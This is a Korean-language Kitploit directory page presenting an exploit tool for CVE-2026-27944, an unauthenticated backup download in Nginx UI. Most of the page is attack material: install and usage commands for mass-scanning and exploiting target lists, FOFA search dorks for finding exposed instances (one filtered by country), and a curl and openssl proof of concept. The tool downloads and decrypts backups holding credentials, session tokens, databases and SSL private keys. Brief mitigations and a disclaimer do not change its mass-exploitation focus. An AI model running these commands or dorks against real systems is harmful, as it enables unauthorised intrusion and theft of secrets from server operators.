Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Cve-2026-27944-Tools-Exploit — 좋아 좋아 | Kitploit
도구/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
ReconnaissanceEncryption/Decryption ToolsPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation Gathering
GitHubbimabalance/cve-2026-27944-tools-exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Cve-2026-27944-Tools-Exploit

좋아 좋아

저장소 보기
11개월 전아직 검토되지 않음

🚀 CVE-2026-27944: Nginx UI 인증되지 않은 백업 익스플로잇

📌 설명

27944.py는 공격자가 인증 없이 Nginx UI 백업을 다운로드하고 복호화할 수 있게 해주는 CVE-2026-27944용 익스플로잇 도구입니다.

이 취약점은 Nginx UI 버전 < 2.3.2에 존재하며 다음에 대한 액세스를 허용합니다:

· 사용자 자격 증명 및 세션 토큰 · SSL 개인 키 · Nginx 구성 · 데이터베이스 파일

🔧 기능

· ✅ 대상 파일에서 대량 스캔 · ✅ 단일 대상 익스플로잇 · ✅ 백업 자동 다운로드 · ✅ AES-256-CBC 자동 복호화 · ✅ 백업에서 자격 증명 자동 추출

🛠️ 설치 방법

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 사용 방법

  1. 대량 스캔
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. 단일 대상 익스플로잇
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. 전체 익스플로잇
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 대상 형식

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 FOFA Dork

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 출력 결과

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ 면책 조항

이 도구는 교육 및 윤리적 보안 테스트 목적으로 제작되었습니다. 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다. 본인이 소유한 시스템 또는 테스트를 위한 서면 허가를 받은 시스템에서만 사용하십시오.

📝 기술적 설명

CVE-2026-27944는 공격자가 인증 없이 /api/backup 엔드포인트에 접근할 수 있게 하는 Nginx UI의 치명적인 취약점입니다. 백업에는 AES-256으로 암호화된 민감한 데이터가 포함되어 있지만, 키와 IV는 X-Backup-Security 헤더를 통해 Base64 형식으로 전송됩니다.

CVSS 점수: 9.8 (치명적)

영향을 받는 버전: Nginx UI < 2.3.2

완화 조치:

  1. Nginx UI v2.3.3으로 업그레이드
  2. /api/backup에 대한 액세스 차단
  3. 모든 자격 증명 로테이션

💀 POC

root@kitploit:~
# Cek vulnerability
curl -I http://target:9000/api/backup

# Download backup
curl -s http://target:9000/api/backup -o backup.bin

# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
도구 다운로드